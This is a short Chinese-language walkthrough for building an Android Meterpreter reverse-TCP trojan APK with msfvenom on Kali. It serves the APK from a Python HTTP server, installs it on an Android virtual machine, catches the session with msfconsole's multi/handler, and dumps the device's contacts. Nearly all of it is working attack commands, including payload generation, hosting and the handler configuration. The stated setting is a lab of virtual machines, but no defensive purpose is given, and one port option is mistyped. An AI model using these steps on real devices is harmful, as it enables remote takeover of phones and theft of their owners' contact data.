清单
1、android手机虚拟机
2、kali系统
查看kali和手机虚拟机的ip地址
1、查看IP地址
ip a #查看手机虚拟机和kali虚拟机的ip地址
2、kali生成木马apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=kali的ip LPOER=随便设置端口号 R > zc.apk
3、 运行本地代码
python3 -m http.server 80
4、android虚拟机获取kali生成的木马apk
wget kali的ip/zc.apk
5、android虚拟机安装木马apk
6、通过木马apk偷袭android虚拟机
msfconsole #启动msf模块
use exploit/multi/handler
1、set payload android/meterpreter/reverse_tcp
2、show options
3、set LHOST kali的ip地址
4、set LPORT 4444
5、run
7、运行android虚拟机的木马apk文件,kali获取android机联系人信息
当android虚拟机运行木马软件时会出现连接信息
dump_contacts #在家目录生成通讯录信息